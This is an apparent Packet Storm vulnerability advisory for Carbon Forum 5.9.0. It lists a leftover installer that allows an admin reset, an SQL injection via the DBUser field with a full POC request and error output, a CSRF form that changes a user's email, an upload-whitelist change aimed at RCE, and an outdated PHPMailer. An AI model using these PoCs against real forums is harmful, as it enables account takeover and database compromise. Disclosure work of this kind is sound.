Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection

2024-06-2400:00:00
bRpsd
packetstormsecurity.com
carbon forum
5.9.0
multiple exploits
csrf
sql injection
cross site request forgery
database settings
administrator password
sql
mariadb
7.4 High
AI Score
Confidence
Low
JSON
`{-} Title => Carbon Forum 5.9.0 - Multiple Exploits  
{-} Author => bRpsd [[email protected]]  
{-} Date Release => 22 June, 2024  
{-} Vendor => Carbon Forum <= 5.9.0  
Homepage => https://www.94cb.com/  
Download => https://github.com/lincanbin/Carbon-Forum  
Vulnerable Versions => 5.9.0 >=  
Tested Version => 5.9.0 on xampp Server.  
  
  
  
#######################################################################################  
Vulnerability #1 : Reset Administrator Password & Database settings  
File Path: http://localhost/Carbon-Forum/install/  
INFO: The install folder remains after installation which allows attackers to recreate a new DB and have an admin account by default through registering the first user  
#######################################################################################  
  
  
  
#######################################################################################  
Vulnerability #2 : SQL Injection  
Vulnerable Code: /Carbon-Forum/install/index.php  
if ($_SERVER['REQUEST_METHOD'] == 'POST') {  
$fp = fopen(__DIR__ . '/database.sql', "r") or die("SQL文件无法打开。 The SQL File could not be opened.");  
//dobefore  
if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) {  
$Language = $_POST['Language'];  
$DBHost = $_POST['DBHost'];  
$DBName = $_POST['DBName'];  
$DBUser = $_POST['DBUser'];  
$DBPassword = $_POST['DBPassword'];  
$SearchServer = $_POST['SearchServer'];  
$SearchPort = $_POST['SearchPort'];  
$EnableMemcache = $_POST['EnableMemcache'];  
$MemCachePrefix = $_POST['MemCachePrefix'];  
} else {  
die("An Unexpected Error Occured!");  
}  
//$WebsitePath = $_POST['WebsitePath'];  
$WebsitePath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];  
if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) {  
$WebsitePath = $WebsitePathMatch[1];  
} else {  
$WebsitePath = '';  
}  
//初始化数据库操作类  
require('../library/PDO.class.php');  
$DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword);  
$DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName));  
if (empty($DatabaseExist)) {  
$DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";");  
}  
  
POC Request:  
POST http://localhost/Carbon-Forum/install/?  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br, zstd  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 173  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/Carbon-Forum/install/  
Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / Install  
  
Response:  
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1  
You can find the error back in the log.  
#######################################################################################  
  
  
################################################################################################################  
Vulnerability #3 : CSRF - Change users email   
File Path: http://localhost/Carbon-Forum/settings  
Method: POST  
Parameter : UserMail  
Code:Carbon-Forum/controller/settings.php  
  
  
POC:  
case 'UpdateUserInfo':  
$CurUserInfo['UserSex'] = intval(Request('POST', 'UserSex', 0));  
$CurUserInfo['UserMail'] = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail'];  
$CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage']));  
$CurUserInfo['UserIntro'] = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro']));  
$UpdateUserInfoResult = UpdateUserInfo(array(  
'UserSex' => $CurUserInfo['UserSex'],  
'UserMail' => $CurUserInfo['UserMail'],  
'UserHomepage' => $CurUserInfo['UserHomepage'],  
'UserIntro' => $CurUserInfo['UserIntro']  
));  
if ($UpdateUserInfoResult) {  
$UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully'];  
  
<form method='POST' action='http://localhost/Carbon-Forum/settings'>  
<input type="hidden" name="Action" value="UpdateUserInfo">  
<input type="hidden" name="UserSex" value="0">  
<input type="hidden" name="UserMail" value="[email protected]">  
<input type="hidden" name="UserHomepage" value="">  
<input type="hidden" name="UserIntro" value="">  
<input type='submit' value='submit'>  
</form>  
################################################################################################################  
  
  
#######################################################################################  
Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated]  
Info: Administrator can change allowed files in dashboard -> parameter  
POC POST:  
http://localhost/Carbon-Forum/dashboard#dashboard4  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br, zstd  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 14662  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/Carbon-Forum/dashboard  
Cookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktop  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Action=Parameter&UploadParameters=/* 前后端通信相关的配置,注释只允许使用多行方式 */ { /* 上传图片配置项 */ "imageActionName": "uploadimage", /* 执行上传图片的action名称 */ "imageFieldName": "upfile", /* 提交的图片表单名称 */ "imageMaxSize": 4096000, /* 上传大小限制，单位B */ "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 上传图片格式显示 */ "imageCompressEnable": true, /* 是否压缩图片,默认是true */ "imageCompressBorder": 1600, /* 图片压缩最长边限制 */ "imageInsertAlign": "none", /* 插入的图片浮动方式 */ "imageUrlPrefix": "", /* 图片访问路径前缀 */ "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ /* {filename} 会替换成原文件名,配置这项需要注意中文乱码问题 */ /* {rand:6} 会替换成随机数,后面的数字是随机数的位数 */ /* {time} 会替换成时间戳 */ /* {yyyy} 会替换成四位年份 */ /* {yy} 会替换成两位年份 */ /* {mm} 会替换成两位月份 */ /* {dd} 会替换成两位日期 */ /* {hh} 会替换成两位小时 */ /* {ii} 会替换成两位分钟 */ /* {ss} 会替换成两位秒 */ /* 非法字符 \ : * ? " < > | */ /* 具请体看线上文档: fex.baidu.com/ueditor/#use-format_upload_filename */ /* 涂鸦图片上传配置项 */ "scrawlActionName": "uploadscrawl", /* 执行上传涂鸦的action名称 */ "scrawlFieldName": "upfile", /* 提交的图片表单名称 */ "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "scrawlMaxSize": 2048000, /* 上传大小限制，单位B */ "scrawlUrlPrefix": "", /* 图片访问路径前缀 */ "scrawlInsertAlign": "none", "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 截图工具上传 */ "snapscreenActionName": "uploadimage", /* 执行上传截图的action名称 */ "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "snapscreenUrlPrefix": "", /* 图片访问路径前缀 */ "snapscreenInsertAlign": "none", /* 插入的图片浮动方式 */ /* 抓取远程图片配置 */ "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"], "catcherActionName": "catchimage", /* 执行抓取远程图片的action名称 */ "catcherFieldName": "source", /* 提交的图片列表表单名称 */ "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "catcherUrlPrefix": "", /* 图片访问路径前缀 */ "catcherMaxSize": 2048000, /* 上传大小限制，单位B */ "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 抓取图片格式显示 */ /* 上传视频配置 */ "videoActionName": "uploadvideo", /* 执行上传视频的action名称 */ "videoFieldName": "upfile", /* 提交的视频表单名称 */ "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "videoUrlPrefix": "", /* 视频访问路径前缀 */ "videoMaxSize": 20480000, /* 上传大小限制，单位B，默认20MB */ "videoAllowFiles": [ ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* 上传视频格式显示 */ /* 上传文件配置 */ "fileActionName": "uploadfile", /* controller里,执行上传视频的action名称 */ "fileFieldName": "upfile", /* 提交的文件表单名称 */ "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "fileUrlPrefix": "", /* 文件访问路径前缀 */ "fileMaxSize": 2048000, /* 上传大小限制，单位B，默认2MB */ "fileAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ], /* 上传文件格式显示 */ /* 列出指定目录下的图片 */ "imageManagerActionName": "listimage", /* 执行图片管理的action名称 */ "imageManagerListPath": "/upload/image/", /* 指定要列出图片的目录 */ "imageManagerListSize": 60, /* 每次列出文件数量 */ "imageManagerUrlPrefix": "", /* 图片访问路径前缀 */ "imageManagerInsertAlign": "none", /* 插入的图片浮动方式 */ "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 列出的文件类型 */ /* 列出指定目录下的文件 */ "fileManagerActionName": "listfile", /* 执行文件管理的action名称 */ "fileManagerListPath": "/upload/file/", /* 指定要列出文件的目录 */ "fileManagerUrlPrefix": "", /* 文件访问路径前缀 */ "fileManagerListSize": 60, /* 每次列出文件数量 */ "fileManagerAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ] /* 列出的文件类型 */ }&TextFilterParameter=/* 关键词过滤相关的配置,注释只允许使用多行方式 */ { /* 关键词均支持正则表达式，过多的过滤会影响性能 "fuck" : "f**k", 以上规则表示发表含fuck的内容，会被过滤为f**k "negro" : [false, 30], Don't issue text with "negro", or it will freeze for 30 seconds. "蛤" : [false, 30], 以上规则禁止发布含“蛤”的内容，并且尝试发表该内容的用户会被续(jin)掉(yan)30秒生命 "negro" : ["black", 30], "包子" : ["维尼", 30], 以上规则表示发表含"包子"的内容，会被过滤为"维尼"，并且在内容发表成功后，需要再等30秒才能发言 */ /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包子" : ["维尼", 30] */ }&submit=Save settings  
  
#######################################################################################  
  
  
  
#######################################################################################  
Vulnerability #4 : Vulnerable PHPMailer library  
File: /Carbon-Forum/library/PHPMailer.class.php  
Version: $Version = '5.2.16';  
#######################################################################################  
`
7.4 High
AI Score
Confidence
Low
JSON